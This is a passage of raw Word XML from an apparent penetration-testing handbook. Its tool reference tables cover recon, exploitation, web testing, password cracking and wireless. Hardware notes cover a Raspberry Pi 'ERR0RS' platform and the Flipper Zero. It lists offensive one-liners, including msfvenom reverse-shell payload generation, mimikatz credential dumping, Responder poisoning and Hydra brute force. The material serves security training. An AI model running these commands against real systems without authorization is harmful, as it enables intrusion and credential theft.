          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART SIX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">TOOLS, HARDWARE &amp; PROJECTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 10: Security Tools Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This chapter provides a concise reference for the most important security tools you'll use. For each tool, understand not just how to use it, but why it works the way it does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Information Gathering &amp; Reconnaissance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700"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>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7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Key Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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nmap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Port Scanner</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nmap -sV -A -p- target</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standard. Learn it deeply.</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masscan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Port Scanner</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masscan -p80,443 --rate=10000 10.0.0.0/8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Fastest scanner, but louder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theHarvester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OSINT</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theHarvester -d example.com -b google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 subdomain harvesting</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recon-ng</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OSINT Framework</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Interactive framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Modular OSINT platform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Shodan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OSINT</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shodan search 'apache port:80'</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IoT and exposed services search</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dnsenum</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DNS Enum</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dnsenum example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Zone transfers, subdomain brute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subfinder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Subdomain Enum</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subfinder -d example.com</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 passive subdomain discovery</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amass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Attack Surface</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amass enum -d example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Comprehensive asset discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Exploitation &amp; Post-Exploitation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700"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>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7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Key Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Metasploit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Exploitation Framework</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msfconsole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Industry standard framework</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msfvenom</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Payload Generator</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msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Creates custom payloads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searchsploit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Exploit DB Search</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searchsploit ms17-010</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Local copy of ExploitDB</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impacket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Network Protocols</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impacket-psexec, secretsdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Python network tools suite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CrackMapExec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Network Pentesting</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crackmapexec smb target -u user -p pass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Swiss army knife for AD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Responder</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Hash Capture</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responder -I eth0 -wrf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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LLMNR/NBT-NS poisoning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BloodHound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 Analysis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bloodhound-python -d domain.local</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Attack path visualization for AD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mimikatz</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Credential Dumping</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sekurlsa::logonpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Windows credential extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 Web Application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700"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>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7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Key Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Burp Suite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 Proxy/Scanner</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Intercept proxy, Scanner, Repeater, Intruder</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Essential web app testing tool</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SQLMap</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SQL Injection</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sqlmap -u 'url?id=1' --dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Automates SQL injection discovery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Gobuster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Directory Brute Force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gobuster dir -u url -w wordlist</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 directory enumeration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Feroxbuster</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Directory Brute Force</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feroxbuster -u url -w wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Recursive directory brute force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Nikto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 Scanner</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nikto -h http://target.com</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 server misconfiguration scanner</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wfuzz</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Web Fuzzer</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wfuzz -c -z file,wordlist --hc 404 url/FUZZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Flexible web fuzzing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Nuclei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Vulnerability Scanner</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nuclei -u https://target.com</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Template-based fast scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4 Password Cracking &amp; Credential Attacks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700"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>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7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Key Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Hashcat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Password Cracking</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hashcat -m 1000 hashes.txt rockyou.txt</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GPU-accelerated; fastest cracker</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John the Ripper</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Password Cracking</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john --wordlist=rockyou.txt hashes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CPU-based; great for many hash types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Hydra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Brute Force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hydra -l admin -P wordlist.txt ssh://target</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Network login brute forcing</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Medusa</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Brute Force</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medusa -h target -u admin -P list.txt -M ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Alternative to Hydra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CeWL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Wordlist Generator</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cewl http://target.com -m 5 -w wordlist.txt</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Generates wordlists from websites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Crunch</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Wordlist Generator</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crunch 8 12 ABC123 -o wordlist.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Generates wordlists by pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5 Wireless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700"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>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7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Key Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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aircrack-ng suite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WiFi Cracking</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airmon-ng, airodump-ng, aireplay-ng, aircrack-ng</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 WPA/WEP attack suite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wifite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WiFi Automation</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wifite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Automates wireless attacks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Reaver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WPS Attacks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reaver -i wlan0mon -b BSSID -vv</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WPS PIN brute force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Kismet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Wireless IDS/Monitor</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kismet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Passive wireless monitoring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Wireshark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Packet Capture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GUI or tshark from CLI</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standard packet analyzer</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tcpdump</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Packet Capture</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tcpdump -i eth0 -w capture.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CLI packet capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 11: Hardware Hacking &amp; Embedded Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern penetration testing increasingly involves physical hardware. From WiFi attack devices to hardware implants, understanding embedded systems gives you capabilities that purely software-based tools cannot match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11.1 Key Hardware Platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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Device</w:t>
            </w:r>
          </w:p>
        </w:tc>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Primary Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Key Capabilities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Raspberry Pi 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attack platform/server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Linux, PCIe, high performance, GPIO</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ESP32</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WiFi/Bluetooth attacks, payloads</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WiFi deauth, BLE scanning, low power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Flipper Zero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Multi-protocol RF tool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Sub-GHz, NFC, RFID, IR, GPIO, BadUSB</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WiFi Pineapple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WiFi MITM and monitoring</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Rogue AP, deauth, PMK capture, PineAP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LilyGo T-Display S3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Portable tool with display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ESP32-S3, built-in display, compact form</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Rubber Ducky / BadUSB</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Physical access attacks</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Emulates keyboard, runs payloads on plug-in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HackRF One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Software Defined Radio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Wide-range RF capture and transmission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11.2 Raspberry Pi as an Attack Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Raspberry Pi 5 is exceptional for security research due to its PCIe interface, high performance ARM CPU, and full Linux support. When configured as ERR0RS, it becomes a portable AI-powered penetration testing platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Specs for Security Work (Pi 5):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Quad-core ARM Cortex-A76 @ 2.4GHz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8GB or 16GB LPDDR4X RAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PCIe 2.0 FFC connector (for NVMe SSDs and AI accelerators)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dual USB 3.0 ports (for wireless adapters in monitor mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPIO header (for hardware modules and sensors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PCIe Hardware Stack (from ERR0RS project):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Waveshare PCIe 2-CH splitter: Adds two PCIe slots to the Pi 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Raspberry Pi AI HAT+ 2 (Hailo-10H): 40 TOPS neural accelerator for local AI inference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Geekworm X1004 NVMe HAT: Dual NVMe M.2 slots for fast, high-capacity storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The Hailo-10H NPU requires Debian Trixie or later. It will NOT work on Raspberry Pi OS Bookworm. Always check OS compatibility before assembling hardware stacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11.3 The Flipper Zero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Flipper Zero is a multi-protocol radio tool that looks like a toy but is a serious security research device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-GHz: Reads, saves, and replays RF signals (garage doors, key fobs, older access cards)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NFC: Read/write NFC cards (not active HF RFID like MIFARE Classic without brute force)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RFID: Low frequency (125kHz) card reading (access badges, animal chips)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
